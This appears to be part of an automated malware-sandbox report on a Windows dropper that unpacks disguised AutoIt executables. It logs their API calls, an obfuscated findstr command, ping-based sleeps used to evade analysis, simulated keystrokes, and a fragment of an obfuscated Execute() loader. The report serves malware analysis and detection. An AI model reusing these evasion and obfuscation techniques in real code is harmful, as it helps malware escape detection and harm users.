Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comSection loaded: rasadhlp.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Tt843YGUx5.exeStatic file information: File size 9326758 > 1048576

Data Obfuscation

barindex
Obfuscated command line found
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm Jump to behavior
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_0040760A LoadLibraryA,GetProcAddress,GetWindow,GetWindow,GetDlgItem,GetWindow,0_2_0040760A
Source: Tt843YGUx5.exeStatic PE information: real checksum: 0xf0b0e should be: 0x8e8212
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_3_02587F5C pushfd ; ret 0_3_02587FBC
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_3_02587F5C pushfd ; ret 0_3_02587FBC
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_3_02587D9F push ds; retf 0_3_02587DA5
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_3_02587D9F push ds; retf 0_3_02587DA5
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_3_02587F5C pushfd ; ret 0_3_02587FBC
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_3_02587F5C pushfd ; ret 0_3_02587FBC
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_3_02587D9F push ds; retf 0_3_02587DA5
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_3_02587D9F push ds; retf 0_3_02587DA5
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_00418690 push eax; ret 0_2_004186BE
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0078E93F push edi; ret 5_2_0078E941
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0078EA58 push esi; ret 5_2_0078EA5A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007C8A4A push FFFFFF8Bh; iretd 5_2_007C8A4C
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_00788B75 push ecx; ret 5_2_00788B88
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0077CBDB push eax; retf 5_2_0077CBF8
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0078EC33 push esi; ret 5_2_0078EC35
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0077CC06 push eax; retf 5_2_0077CBF8
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0078ED1C push edi; ret 5_2_0078ED1E
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A7E93F push edi; ret 7_2_00A7E941
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00AB8A4A push FFFFFF8Bh; iretd 7_2_00AB8A4C
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A7EA58 push esi; ret 7_2_00A7EA5A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A78B75 push ecx; ret 7_2_00A78B88
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A7EC33 push esi; ret 7_2_00A7EC35
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A7ED1C push edi; ret 7_2_00A7ED1E
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003FE93F push edi; ret 11_2_003FE941
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_00438A4A push FFFFFF8Bh; iretd 11_2_00438A4C
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003FEA58 push esi; ret 11_2_003FEA5A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003F8B75 push ecx; ret 11_2_003F8B88
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003ECBF4 push eax; retf 11_2_003ECBF8
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003FEC33 push esi; ret 11_2_003FEC35
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003FED1C push edi; ret 11_2_003FED1E

Persistence and Installation Behavior

barindex
Drops PE files with a suspicious file extension
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007E59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,5_2_007E59B3
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_00775EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_00775EDA
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00AD59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,7_2_00AD59B3
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A65EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,7_2_00A65EDA
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_004559B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_004559B3
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003E5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_003E5EDA
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007833B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_007833B7
Source: C:\Users\user\Desktop\Tt843YGUx5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Uses ping.exe to sleep
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comAPI coverage: 4.1 %
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comAPI coverage: 4.0 %
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comAPI coverage: 4.2 %
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_00409054 ??2@YAPAXI@Z,FindFirstFileW,FindClose,0_2_00409054
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_00403186 FindFirstFileW,FindClose,SetLastError,CompareFileTime,0_2_00403186
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_00402A8E FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402A8E
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_00402B9F FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,0_2_00402B9F
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007C494A GetFileAttributesW,FindFirstFileW,FindClose,5_2_007C494A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007C4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_007C4005
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007CC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_007CC2FF
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007CCD14 FindFirstFileW,FindClose,5_2_007CCD14
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007CCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_007CCD9F
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007CF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_007CF5D8
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007CF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_007CF735
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007CFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_007CFA36
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007C3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_007C3CE2
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00AB494A GetFileAttributesW,FindFirstFileW,FindClose,7_2_00AB494A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00AB4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_00AB4005
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00ABC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,7_2_00ABC2FF
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00ABCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,7_2_00ABCD9F
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00ABCD14 FindFirstFileW,FindClose,7_2_00ABCD14
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00ABF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_00ABF5D8
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00ABF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_00ABF735
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00ABFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,7_2_00ABFA36
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00AB3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_00AB3CE2
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_0043494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_0043494A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_00434005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00434005
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_0043C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0043C2FF
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_0043CD14 FindFirstFileW,FindClose,11_2_0043CD14
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_0043CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_0043CD9F
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_0043F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0043F5D8
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_0043F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0043F735
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_0043FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0043FA36
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_00433CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00433CE2
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_00775D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_00775D13
Source: Bonta.exe.com, 00000007.00000003.1723632225.000000000357B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VNswdqkJHGRvmueigEoCbcbzzRZsYHefjSEKYHhxeqEMuIKbJG_112
Source: Bonta.exe.com, 00000007.00000003.1724859366.00000000034AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ImcUYqPiljrtfCXuiybhGfsGnPyqZsDGmIGOiUjxeHzzdrbOpfUfToF;
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.0000000002BCA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Local $puvSDtqYrsfhEL = 'RPPoXblPCCcjAMnWzIKfyWHmssVRhgFSwWmgXhfRYsTdoRmjEcVFUc'
Source: Inebriarti.exe.com, 00000005.00000003.1752328553.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1752435949.0000000003713000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1753609737.000000000372B000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1752745370.000000000372A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kImZXeDRqjFLvNVshxWmCEEFWYFxpoalRvHQqemUF02#121#45#44#<l&
Source: Bonta.exe.com, 0000000A.00000002.2926103840.0000000003A06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GKHRXXDEQEMuQreonZWtXO
Source: Inebriarti.exe.com, 00000005.00000003.1748045980.00000000039F3000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000008.00000002.2926448957.00000000041AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RPPoXblPCCcjAMnWzIKfyWHmssVRhgFSwWmgXhfRYsTdoRmjEcVFUc
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.0000000002BCA000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1711066834.0000000000CD7000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1696988883.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1696668926.0000000000C84000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1695659728.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1711553711.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1708881008.0000000000CD6000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1711228480.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1711402478.0000000000D3F000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1705319177.0000000000CBA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $VdwHnUJpYBHGiro = Execute(GKHRXxdEq("92_125_123_114_119_112_82_124_79_117_120_106_125_49_48_77_88_78_126_116_116_131_76_92_48_50",9)), $XDDiCUzGlnMH = 'ImcUYqPiljrtfCXuiybhGfsGnP'
